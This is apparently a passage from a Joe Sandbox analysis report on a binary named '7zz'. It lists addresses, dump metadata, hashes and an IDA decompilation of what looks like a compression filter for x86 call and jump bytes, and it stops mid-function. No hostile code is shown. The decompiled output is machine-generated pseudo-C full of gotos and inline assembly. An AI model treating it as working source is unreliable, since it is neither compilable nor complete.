                                                                                                                                    0x004592ae
                                                                                                                                    0x004592b7
                                                                                                                                    0x004592c5
                                                                                                                                    0x004592cf
                                                                                                                                    0x004592cf
                                                                                                                                    0x004592b7
                                                                                                                                    0x004592d1
                                                                                                                                    0x004592d1
                                                                                                                                    0x004592d7
                                                                                                                                    0x004592d9
                                                                                                                                    0x004592db
                                                                                                                                    0x004592dc
                                                                                                                                    0x004592ef
                                                                                                                                    0x004592f2
                                                                                                                                    0x004592fb
                                                                                                                                    0x00459309
                                                                                                                                    0x00459313
                                                                                                                                    0x00459313
                                                                                                                                    0x004592fb
                                                                                                                                    0x00459315
                                                                                                                                    0x00459315
                                                                                                                                    0x0045931a
                                                                                                                                    0x0045931c
                                                                                                                                    0x0045931e
                                                                                                                                    0x0045931f
                                                                                                                                    0x00459332
                                                                                                                                    0x00459335
                                                                                                                                    0x0045933e
                                                                                                                                    0x0045934c
                                                                                                                                    0x00459356
                                                                                                                                    0x00459356
                                                                                                                                    0x0045933e
                                                                                                                                    0x00459358
                                                                                                                                    0x00459358
                                                                                                                                    0x0045935d
                                                                                                                                    0x0045935f
                                                                                                                                    0x00459361
                                                                                                                                    0x00459362
                                                                                                                                    0x00459375
                                                                                                                                    0x00459378
                                                                                                                                    0x00459381
                                                                                                                                    0x0045938f
                                                                                                                                    0x00459399
                                                                                                                                    0x00459399
                                                                                                                                    0x00459381
                                                                                                                                    0x0045939b
                                                                                                                                    0x0045939b
                                                                                                                                    0x0045939e
                                                                                                                                    0x004593a1
                                                                                                                                    0x004593a1
                                                                                                                                    0x004593a1
                                                                                                                                    0x004593ab
                                                                                                                                    0x004593af
                                                                                                                                    0x004593b1
                                                                                                                                    0x004593b1
                                                                                                                                    0x004593b6
                                                                                                                                    0x004593b1
                                                                                                                                    0x004593c1
                                                                                                                                    0x004593c8
                                                                                                                                    0x004593ca
                                                                                                                                    0x004593ca
                                                                                                                                    0x004593d2
                                                                                                                                    0x004593e0
                                                                                                                                    0x004593e0
                                                                                                                                    0x004593e2
                                                                                                                                    0x004593e4
                                                                                                                                    0x004593e8
                                                                                                                                    0x004593f0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004593f6
                                                                                                                                    0x004593f6
                                                                                                                                    0x004593f6
                                                                                                                                    0x004593f9
                                                                                                                                    0x00459408
                                                                                                                                    0x0045940e
                                                                                                                                    0x00459416
                                                                                                                                    0x00459424
                                                                                                                                    0x0045942f
                                                                                                                                    0x00459432
                                                                                                                                    0x00459432
                                                                                                                                    0x0045943b
                                                                                                                                    0x0045943c
                                                                                                                                    0x00459440
                                                                                                                                    0x004594ae
                                                                                                                                    0x004594b0
                                                                                                                                    0x004594b7
                                                                                                                                    0x004594bd
                                                                                                                                    0x004594bf
                                                                                                                                    0x004594bf
                                                                                                                                    0x004594c6
                                                                                                                                    0x004594c9
                                                                                                                                    0x004594c9
                                                                                                                                    0x004594d7
                                                                                                                                    0x004594d9
                                                                                                                                    0x004594e1
                                                                                                                                    0x004594f2
                                                                                                                                    0x004594f5
                                                                                                                                    0x004594f5
                                                                                                                                    0x004594f7
                                                                                                                                    0x004594f9
                                                                                                                                    0x00459447
                                                                                                                                    0x00459447
                                                                                                                                    0x0045944b
                                                                                                                                    0x0045944d
                                                                                                                                    0x00459455
                                                                                                                                    0x00459493
                                                                                                                                    0x00459494
                                                                                                                                    0x00459496
                                                                                                                                    0x00459497
                                                                                                                                    0x00459498
                                                                                                                                    0x00459499
                                                                                                                                    0x004594a1
                                                                                                                                    0x004594a6
                                                                                                                                    0x004594a6
                                                                                                                                    0x00459457
                                                                                                                                    0x00459457
                                                                                                                                    0x0045945b
                                                                                                                                    0x00459461
                                                                                                                                    0x00459465
                                                                                                                                    0x0045946e
                                                                                                                                    0x00459479
                                                                                                                                    0x0045947a
                                                                                                                                    0x0045947d
                                                                                                                                    0x00459481
                                                                                                                                    0x00459485
                                                                                                                                    0x00459485
                                                                                                                                    0x0045945b
                                                                                                                                    0x00459455
                                                                                                                                    0x004594fd
                                                                                                                                    0x004594ff
                                                                                                                                    0x0045950e
                                                                                                                                    0x00459512
                                                                                                                                    0x00459514
                                                                                                                                    0x00000000
                                                                                                                                    0x00459514
                                                                                                                                    0x00000000
                                                                                                                                    0x00459512
                                                                                                                                    0x0045951d
                                                                                                                                    0x00459523
                                                                                                                                    0x0045958a
                                                                                                                                    0x00459525
                                                                                                                                    0x00459525
                                                                                                                                    0x00459525
                                                                                                                                    0x0045952d
                                                                                                                                    0x00459539
                                                                                                                                    0x0045953b
                                                                                                                                    0x0045954a
                                                                                                                                    0x00459552
                                                                                                                                    0x00459552
                                                                                                                                    0x0045955c
                                                                                                                                    0x0045955f
                                                                                                                                    0x00459563
                                                                                                                                    0x0045957a
                                                                                                                                    0x0045957a

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: YA1
                                                                                                                                    • API String ID: 0-613462611
                                                                                                                                    • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                                                                    • Instruction ID: dd7e7172c6b64ed9de0095458c467a227dd947ad75ddcf7282d203c4dea92fff
                                                                                                                                    • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                                                                    • Instruction Fuzzy Hash: 6FD1F1715046168FD729CF1DC494236BBE1EF86305F094ABEED928B386D7389D19CB48
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046E6BC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0046E6C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: 96d1a218dc145cbfe683c815ed6cd5901e87ae0f4932733bae86baee2274f339
                                                                                                                                    • Instruction ID: e72988c6cc3c963252b8e5e8b60d16be35970219d15e6aeca3667ec21c81da3b
                                                                                                                                    • Opcode Fuzzy Hash: 96d1a218dc145cbfe683c815ed6cd5901e87ae0f4932733bae86baee2274f339
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004442E0 Relevance: .7, Instructions: 713COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E004442E0(intOrPtr __ecx) {
				signed int _t310;
				signed int _t312;
				void* _t328;
				signed int _t330;
				signed int _t334;
				intOrPtr _t340;
				signed int _t346;
				signed int _t347;
				intOrPtr _t352;
				signed int _t357;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t384;
				unsigned int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t402;
				unsigned int _t404;
				signed int _t407;
				signed int _t411;
				void* _t414;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				signed int _t428;
				signed int _t437;
				signed int _t443;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t451;
				signed char _t452;
				signed char _t453;
				signed char _t460;
				signed int _t461;
				signed char _t462;
				intOrPtr* _t483;
				signed int _t486;
				void* _t490;
				signed int _t493;
				signed int _t494;
				intOrPtr* _t499;
				signed int _t517;
				signed int _t545;
				intOrPtr _t548;
				intOrPtr _t567;
				unsigned int _t568;
				intOrPtr _t569;
				signed int _t580;
				unsigned int _t582;
				intOrPtr _t589;
				signed int _t593;
				signed int _t597;
				intOrPtr _t607;
				void* _t611;
				signed int _t612;
				signed int _t613;
				intOrPtr _t614;
				signed int _t615;
				intOrPtr _t616;
				signed int _t623;
				signed int _t624;
				signed int _t625;
				signed int* _t626;
				signed int _t627;
				intOrPtr _t628;
				intOrPtr* _t629;
				signed int _t630;
				signed int* _t631;
				signed int _t632;
				signed int _t634;
				signed int* _t640;
				intOrPtr _t641;
				intOrPtr _t643;
				intOrPtr _t644;
				void* _t648;
				signed int _t649;
				signed int _t650;
				signed int _t653;
				unsigned int _t657;
				void* _t658;
				intOrPtr _t660;
				void* _t661;

				_push(0xffffffff);
				_push(E004791D0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t660;
				_t661 = _t660 - 0x60;
				_t607 = __ecx;
				 *((intOrPtr*)(_t661 + 0x10)) = __ecx;
				if( *(_t661 + 0x78) != 1) {
					L141:
					_t310 = 0x80070057;
					L142:
					 *[fs:0x0] =  *((intOrPtr*)(_t661 + 0x70));
					return _t310;
				}
				_t664 =  *(_t661 + 0x94) - 4;
				if( *(_t661 + 0x94) != 4) {
					goto L141;
				}
				if(E00444040(__ecx, _t664) != 0) {
					_t312 =  *(_t661 + 0x84);
					__eflags = _t312;
					 *(_t661 + 0x88) = 0;
					 *((intOrPtr*)(_t661 + 0x58)) = 0;
					 *(_t661 + 0x5c) = 0;
					if(_t312 == 0) {
						L10:
						 *((intOrPtr*)(_t661 + 0x34)) = _t607;
						_t638 =  *(_t661 + 0x8c);
						 *(_t661 + 0x78) = 0;
						_t450 =  *( *(_t661 + 0x80));
						 *(_t661 + 0x28) = _t450;
						L0040EEC1(_t607 + 0x10,  *( *(_t661 + 0x8c)));
						L0040EED0(_t607 + 0x10);
						L0040EEC1(_t607 + 0x38,  *((intOrPtr*)( *(_t661 + 0x8c) + 4)));
						L0040EED0(_t607 + 0x38);
						L0040EEC1(_t607 + 0x60,  *((intOrPtr*)( *(_t661 + 0x8c) + 8)));
						L0040EED0(_t607 + 0x60);
						L0040EEC1(_t607 + 0xa0,  *((intOrPtr*)(_t638 + 0xc)));
						_t640 = _t607 + 0x88;
						L0040EED0( &(_t640[6]));
						_t640[2] = 0;
						_t640[3] = 0;
						_t640[4] = 0xffffffff;
						 *_t640 = 1;
						_t640[1] = 0;
						memset(_t607 + 0xc8, 0x400, 0x102 << 2);
						_t661 = _t661 + 0xc;
						 *(_t661 + 0x14) = 0;
						 *(_t661 + 0x84) = 1;
						 *((intOrPtr*)( *_t450))(_t450, 0x47a4e8, _t661 + 0x14);
						_t451 = 0;
						__eflags = 0;
						 *((intOrPtr*)(_t661 + 0x18)) = 0;
						 *((intOrPtr*)(_t661 + 0x48)) = 0;
						 *((intOrPtr*)(_t661 + 0x4c)) = 0;
						 *(_t661 + 0x80) = 0;
						 *((intOrPtr*)(_t661 + 0x50)) = 0;
						 *((intOrPtr*)(_t661 + 0x54)) = 0;
						 *(_t661 + 0x40) = 0;
						 *(_t661 + 0x44) = 0;
						 *(_t661 + 0x38) = 0;
						 *(_t661 + 0x3c) = 0;
						while(1) {
							_t611 = 0;
							_t328 = 0x20000 - _t451;
							__eflags = 0x20000;
							if(0x20000 == 0) {
								goto L15;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								_t499 =  *((intOrPtr*)(_t661 + 0x24));
								_t653 =  *((intOrPtr*)( *_t499 + 0xc))(_t499,  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x18)) + 8)) + _t611 + _t451, _t328, _t661 + 0x28);
								__eflags = _t653;
								if(_t653 != 0) {
									break;
								}
								_t443 =  *(_t661 + 0x28);
								__eflags = _t443;
								if(_t443 == 0) {
									goto L15;
								}
								_t611 = _t611 + _t443;
								_t328 = 0x20000 - _t611 - _t451;
								__eflags = 0x20000;
								if(0x20000 != 0) {
									continue;
								}
								goto L15;
							}
							_t437 =  *(_t661 + 0x14);
							 *(_t661 + 0x78) = 0;
							__eflags = _t437;
							if(_t437 != 0) {
								 *((intOrPtr*)( *_t437 + 8))(_t437);
							}
							_t642 =  *((intOrPtr*)(_t661 + 0x10));
							 *(_t661 + 0x78) = 0xffffffff;
							L00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x24);
							L00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x4c);
							L00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x74);
							L00437D6C(_t642 + 0xb4);
							_t310 = _t653;
							goto L142;
							L15:
							_t612 = _t611 + _t451;
							__eflags = _t612 - 5;
							 *(_t661 + 0x20) = _t612;
							if(_t612 < 5) {
								_t648 = 0;
								__eflags = _t612;
								if(__eflags <= 0) {
									L119:
									_t641 =  *((intOrPtr*)(_t661 + 0x10));
									_t613 = E004441E0(_t641, __eflags);
									_t330 =  *(_t661 + 0x14);
									__eflags = _t330;
									 *(_t661 + 0x78) = 0;
									if(_t330 != 0) {
										 *((intOrPtr*)( *_t330 + 8))(_t330);
									}
									 *(_t661 + 0x78) = 0xffffffff;
									L00437D6C(_t641 + 0x24);
									L00437D6C(_t641 + 0x4c);
									L00437D6C(_t641 + 0x74);
									_t334 =  *(_t641 + 0xb4);
									__eflags = _t334;
									if(_t334 != 0) {
										 *((intOrPtr*)( *_t334 + 8))(_t334);
										 *(_t641 + 0xb4) = 0;
									}
									_t310 = _t613;
									goto L142;
								} else {
									goto L107;
								}
								do {
									L107:
									_t614 =  *((intOrPtr*)(_t661 + 0x10));
									_t483 = _t614 + 0x10;
									_t452 =  *((intOrPtr*)( *((intOrPtr*)(_t614 + 8)) + _t648));
									 *( *((intOrPtr*)(_t614 + 0x14)) +  *_t483) = _t452;
									_t340 =  *((intOrPtr*)(_t483 + 4)) + 1;
									__eflags = _t340 -  *((intOrPtr*)(_t483 + 8));
									 *((intOrPtr*)(_t483 + 4)) = _t340;
									if(__eflags == 0) {
										L0040EFBD(_t483, __eflags);
									}
									__eflags = _t452 - 0xe8;
									if(_t452 != 0xe8) {
										__eflags = _t452 - 0xe9;
										if(_t452 != 0xe9) {
											__eflags =  *(_t661 + 0x80) - 0xf;
											if( *(_t661 + 0x80) != 0xf) {
												goto L118;
											}
											__eflags = (_t452 & 0x000000f0) - 0x80;
											if((_t452 & 0x000000f0) != 0x80) {
												goto L118;
											}
											_t486 = 0x101;
											goto L116;
										}
										_t486 = 0x100;
										goto L116;
									} else {
										_t486 =  *(_t661 + 0x80) & 0x000000ff;
										L116:
										_t640[4] = (_t640[4] >> 0xb) *  *(_t614 + 0xc8 + _t486 * 4);
										 *(_t614 + 0xc8 + _t486 * 4) = (0x800 -  *(_t614 + 0xc8 + _t486 * 4) >> 5) +  *(_t614 + 0xc8 + _t486 * 4);
										_t346 = _t640[4];
										__eflags = _t346 - 0x1000000;
										if(_t346 < 0x1000000) {
											_t347 = _t346 << 8;
											__eflags = _t347;
											_t640[4] = _t347;
											E00444C10(_t640);
										}
									}
									L118:
									_t648 = _t648 + 1;
									__eflags = _t648 -  *(_t661 + 0x20);
									 *(_t661 + 0x80) = _t452;
								} while (__eflags < 0);
								goto L119;
							}
							_t615 = _t612 + 0xfffffffb;
							__eflags = _t615;
							 *(_t661 + 0x8c) = 0;
							 *(_t661 + 0x30) = _t615;
							do {
								_t616 =  *((intOrPtr*)(_t661 + 0x10));
								_t649 =  *(_t661 + 0x8c);
								_t453 =  *((intOrPtr*)( *((intOrPtr*)(_t616 + 8)) + _t649));
								_t490 = _t616 + 0x10;
								 *( *((intOrPtr*)(_t616 + 0x10)) +  *((intOrPtr*)(_t616 + 0x14))) = _t453;
								 *(_t661 + 0x94) = _t453;
								_t352 =  *((intOrPtr*)(_t490 + 4)) + 1;
								__eflags = _t352 -  *((intOrPtr*)(_t490 + 8));
								 *((intOrPtr*)(_t490 + 4)) = _t352;
								if(__eflags == 0) {
									L0040EFBD(_t490, __eflags);
								}
								__eflags = (_t453 & 0x000000fe) - 0xe8;
								if((_t453 & 0x000000fe) == 0xe8) {
									L23:
									_t493 =  *((intOrPtr*)( *((intOrPtr*)(_t616 + 8)) + _t649 + 4));
									 *(_t661 + 0x84) = _t493;
									_t567 =  *((intOrPtr*)(_t661 + 0x18));
									 *(_t661 + 0x2c) = 0 << 8 << 8;
									_t79 = _t567 + 5; // 0x5
									_t568 = (0 << 8 << 8) + _t649 + _t79;
									_t357 =  *(_t661 + 0x14);
									__eflags = _t357;
									 *(_t661 + 0x1c) = _t568;
									if(_t357 == 0) {
										__eflags =  *(_t661 + 0x88);
										if( *(_t661 + 0x88) == 0) {
											__eflags = _t493;
											if(_t493 == 0) {
												L64:
												_t494 = 1;
												L65:
												_t453 =  *(_t661 + 0x94);
												__eflags = _t453 - 0xe8;
												if(_t453 != 0xe8) {
													__eflags = _t453 - 0xe9;
													_t361 = (0 | _t453 != 0x000000e9) + 0x100;
													__eflags = _t361;
												} else {
													_t361 =  *(_t661 + 0x80) & 0x000000ff;
												}
												__eflags = _t494;
												if(_t494 == 0) {
													_t569 =  *((intOrPtr*)(_t661 + 0x10));
													_t640[4] = (_t640[4] >> 0xb) *  *(_t569 + 0xc8 + _t361 * 4);
													 *(_t569 + 0xc8 + _t361 * 4) = (0x800 -  *(_t569 + 0xc8 + _t361 * 4) >> 5) +  *(_t569 + 0xc8 + _t361 * 4);
													_t362 = _t640[4];
													__eflags = _t362 - 0x1000000;
													if(_t362 >= 0x1000000) {
														L95:
														_t210 = _t661 + 0x8c;
														 *_t210 =  *(_t661 + 0x8c) + 1;
														__eflags =  *_t210;
														goto L96;
													}
													_t625 = _t640[2];
													__eflags = _t625 - 0xff000000;
													_t640[4] = _t362 << 8;
													if(_t625 < 0xff000000) {
														L89:
														_t460 = _t640[1];
														_t626 =  &(_t640[6]);
														do {
															 *((char*)( *_t626 + _t626[1])) = L0046B2E0(_t640[2], 0x20, _t640[3]) + _t460;
															_t580 = _t626[1] + 1;
															_t626[1] = _t580;
															__eflags = _t580 - _t626[2];
															if(__eflags == 0) {
																L0040EFBD(_t626, __eflags);
															}
															_t460 = _t460 | 0x000000ff;
															_t384 =  *_t640 - 1;
															__eflags = _t384;
															 *_t640 = _t384;
														} while (_t384 != 0);
														_t625 = _t640[2];
														_t386 = _t625 >> 0x18;
														__eflags = _t386;
														_t640[1] = _t386;
														L94:
														_t453 =  *(_t661 + 0x94);
														_t627 = _t625 << 8;
														__eflags = _t627;
														_t640[2] = _t627;
														 *_t640 =  *_t640 + 1;
														_t640[3] = 0;
														goto L95;
													}
													_t389 = L0046B2E0(_t625, 0x20, _t640[3]);
													__eflags = _t389;
													if(_t389 == 0) {
														goto L94;
													}
													goto L89;
												} else {
													_t582 = _t640[4];
													_t628 =  *((intOrPtr*)(_t661 + 0x10));
													_t517 = (_t582 >> 0xb) *  *(_t628 + 0xc8 + _t361 * 4);
													_t640[2] = _t640[2] + _t517;
													asm("adc ebp, 0x0");
													_t640[4] = _t582 - _t517;
													 *(_t628 + 0xc8 + _t361 * 4) =  *(_t628 + 0xc8 + _t361 * 4) - ( *(_t628 + 0xc8 + _t361 * 4) >> 5);
													_t390 = _t640[4];
													__eflags = _t390 - 0x1000000;
													if(_t390 >= 0x1000000) {
														L78:
														__eflags = _t453 - 0xe8;
														 *(_t661 + 0x8c) =  *(_t661 + 0x8c) + 5;
														if(_t453 != 0xe8) {
															_t629 =  *((intOrPtr*)(_t661 + 0x10)) + 0x60;
														} else {
															_t629 =  *((intOrPtr*)(_t661 + 0x10)) + 0x38;
														}
														_t657 =  *(_t661 + 0x1c);
														_t461 = 0x18;
														do {
															 *((char*)( *((intOrPtr*)(_t629 + 4)) +  *_t629)) = _t657 >> _t461;
															_t589 =  *((intOrPtr*)(_t629 + 4)) + 1;
															 *((intOrPtr*)(_t629 + 4)) = _t589;
															__eflags = _t589 -  *((intOrPtr*)(_t629 + 8));
															if(__eflags == 0) {
																L0040EFBD(_t629, __eflags);
															}
															_t461 = _t461 - 8;
															__eflags = _t461;
														} while (_t461 >= 0);
														 *(_t661 + 0x80) =  *(_t661 + 0x84);
														goto L97;
													}
													_t630 = _t640[2];
													__eflags = _t630 - 0xff000000;
													_t640[4] = _t390 << 8;
													if(_t630 < 0xff000000) {
														L72:
														_t462 = _t640[1];
														_t631 =  &(_t640[6]);
														do {
															 *((char*)( *_t631 + _t631[1])) = L0046B2E0(_t640[2], 0x20, _t640[3]) + _t462;
															_t593 = _t631[1] + 1;
															_t631[1] = _t593;
															__eflags = _t593 - _t631[2];
															if(__eflags == 0) {
																L0040EFBD(_t631, __eflags);
															}
															_t462 = _t462 | 0x000000ff;
															_t402 =  *_t640 - 1;
															__eflags = _t402;
															 *_t640 = _t402;
														} while (_t402 != 0);
														_t630 = _t640[2];
														_t404 = _t630 >> 0x18;
														__eflags = _t404;
														_t640[1] = _t404;
														L77:
														_t453 =  *(_t661 + 0x94);
														_t632 = _t630 << 8;
														__eflags = _t632;
														_t640[2] = _t632;
														 *_t640 =  *_t640 + 1;
														_t640[3] = 0;
														goto L78;
													}
													_t407 = L0046B2E0(_t630, 0x20, _t640[3]);
													__eflags = _t407;
													if(_t407 == 0) {
														goto L77;
													}
													goto L72;
												}
											}
											__eflags = _t493 - 0xff;
											if(_t493 == 0xff) {
												goto L64;
											}
											_t494 = 0;
											goto L65;
										}
										__eflags = 0 -  *(_t661 + 0x5c);
										if(__eflags > 0) {
											L60:
											_t494 = 0;
											goto L65;
										}
										if(__eflags < 0) {
											goto L64;
										}
										__eflags = _t568 -  *((intOrPtr*)(_t661 + 0x58));
										if(_t568 <  *((intOrPtr*)(_t661 + 0x58))) {
											goto L64;
										}
										goto L60;
									}
									_t658 = _t649 +  *((intOrPtr*)(_t661 + 0x48));
									asm("adc ebx, edi");
									__eflags =  *(_t661 + 0x3c);
									if(__eflags > 0) {
										L38:
										__eflags = _t357;
										if(_t357 != 0) {
											_t634 =  *(_t661 + 0x40);
											_t597 =  *(_t661 + 0x3c);
											_t411 =  *(_t661 + 0x38) - _t634;
											__eflags = _t411;
											asm("sbb edx, [esp+0x44]");
											 *(_t661 + 0x6c) = _t597;
											if(_t411 != 0) {
												L46:
												__eflags = _t493;
												if(_t493 == 0) {
													goto L64;
												}
												__eflags = _t493 - 0xff;
												if(_t493 == 0xff) {
													goto L64;
												}
												_t494 = 0;
												goto L65;
											}
											__eflags = _t411 - 0x1000000;
											if(_t411 <= 0x1000000) {
												asm("cdq");
												asm("adc edx, ebx");
												_t414 =  *(_t661 + 0x2c) + _t658 + 5;
												asm("adc edx, 0x0");
												__eflags = _t597 -  *(_t661 + 0x44);
												if(__eflags < 0) {
													L55:
													_t494 = 0;
													goto L65;
												}
												if(__eflags > 0) {
													L52:
													__eflags = _t597 -  *(_t661 + 0x3c);
													if(__eflags > 0) {
														goto L55;
													}
													if(__eflags < 0) {
														goto L64;
													}
													__eflags = _t414 -  *(_t661 + 0x38);
													if(_t414 <  *(_t661 + 0x38)) {
														goto L64;
													}
													goto L55;
												}
												__eflags = _t414 - _t634;
												if(_t414 < _t634) {
													goto L55;
												}
												goto L52;
											}
											goto L46;
										}
										__eflags =  *(_t661 + 0x88);
										if( *(_t661 + 0x88) == 0) {
											goto L46;
										}
										__eflags = 0 -  *(_t661 + 0x5c);
										if(__eflags > 0) {
											L43:
											_t494 = 0;
											goto L65;
										}
										if(__eflags < 0) {
											goto L64;
										}
										__eflags =  *(_t661 + 0x1c) -  *((intOrPtr*)(_t661 + 0x58));
										if( *(_t661 + 0x1c) <  *((intOrPtr*)(_t661 + 0x58))) {
											goto L64;
										}
										goto L43;
									}
									if(__eflags < 0) {
										goto L27;
										do {
											do {
												L27:
												_t624 =  *((intOrPtr*)( *_t357 + 0xc))(_t357,  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t661 + 0x58)), _t661 + 0x60);
												__eflags = _t624;
												if(_t624 != 0) {
													__eflags = _t624 - 1;
													if(_t624 == 1) {
														L31:
														_t357 =  *(_t661 + 0x14);
														__eflags = _t357;
														if(_t357 != 0) {
															 *((intOrPtr*)( *_t357 + 8))(_t357);
															_t357 = 0;
															__eflags = 0;
															 *(_t661 + 0x14) = 0;
														}
														 *(_t661 + 0x40) = 0;
														 *(_t661 + 0x44) = 0;
														__eflags = 0xffffffff;
														 *(_t661 + 0x38) = 0xffffffff;
														 *(_t661 + 0x3c) = 0xffffffff;
														goto L34;
													}
													__eflags = _t624 - 0x80004001;
													if(_t624 != 0x80004001) {
														_t420 =  *(_t661 + 0x14);
														 *(_t661 + 0x78) = 0;
														__eflags = _t420;
														if(_t420 != 0) {
															 *((intOrPtr*)( *_t420 + 8))(_t420);
														}
														_t644 =  *((intOrPtr*)(_t661 + 0x10));
														 *(_t661 + 0x78) = 0xffffffff;
														L00437D6C(_t644 + 0x24);
														L00437D6C(_t644 + 0x4c);
														_t423 =  *(_t644 + 0x74);
														__eflags = _t423;
														if(_t423 != 0) {
															 *((intOrPtr*)( *_t423 + 8))(_t423);
															 *(_t644 + 0x74) = 0;
														}
														_t424 =  *(_t644 + 0xb4);
														__eflags = _t424;
														if(_t424 != 0) {
															 *((intOrPtr*)( *_t424 + 8))(_t424);
															 *(_t644 + 0xb4) = 0;
														}
														L130:
														_t310 = _t624;
														goto L142;
													}
													goto L31;
												}
												_t428 =  *(_t661 + 0x38);
												_t545 =  *(_t661 + 0x3c);
												 *(_t661 + 0x40) = _t428;
												 *(_t661 + 0x44) = _t545;
												 *(_t661 + 0x38) = _t428 +  *((intOrPtr*)(_t661 + 0x60));
												asm("adc ecx, edi");
												 *(_t661 + 0x3c) = _t545;
												asm("adc eax, 0x0");
												 *((intOrPtr*)(_t661 + 0x50)) =  *((intOrPtr*)(_t661 + 0x50)) + 1;
												_t357 =  *(_t661 + 0x14);
												L34:
												__eflags =  *(_t661 + 0x3c);
											} while (__eflags < 0);
											if(__eflags > 0) {
												break;
											}
											__eflags =  *(_t661 + 0x38) - _t658;
										} while ( *(_t661 + 0x38) < _t658);
										_t493 =  *(_t661 + 0x84);
										goto L38;
									}
									__eflags =  *(_t661 + 0x38) - _t658;
									if( *(_t661 + 0x38) >= _t658) {
										goto L38;
									}
									goto L27;
								} else {
									__eflags =  *(_t661 + 0x80) - 0xf;
									if( *(_t661 + 0x80) != 0xf) {
										L22:
										 *(_t661 + 0x8c) = _t649 + 1;
										L96:
										 *(_t661 + 0x80) = _t453;
										goto L97;
									}
									__eflags = (_t453 & 0x000000f0) - 0x80;
									if((_t453 & 0x000000f0) == 0x80) {
										goto L23;
									}
									goto L22;
								}
								L97:
								_t650 =  *(_t661 + 0x8c);
								__eflags = _t650 -  *(_t661 + 0x30);
							} while (_t650 <=  *(_t661 + 0x30));
							_t364 =  *(_t661 + 0x98);
							 *((intOrPtr*)(_t661 + 0x18)) =  *((intOrPtr*)(_t661 + 0x18)) + _t650;
							_t451 = 0;
							asm("adc edx, ebx");
							__eflags = _t364;
							 *((intOrPtr*)(_t661 + 0x48)) =  *((intOrPtr*)(_t661 + 0x48)) + _t650;
							if(_t364 == 0) {
								L100:
								_t623 =  *(_t661 + 0x20);
								__eflags = _t650 - _t623;
								if(_t650 >= _t623) {
									L102:
									continue;
								} else {
									goto L101;
								}
								do {
									L101:
									_t451 = _t451 + 1;
									_t650 = _t650 + 1;
									__eflags = _t650 - _t623;
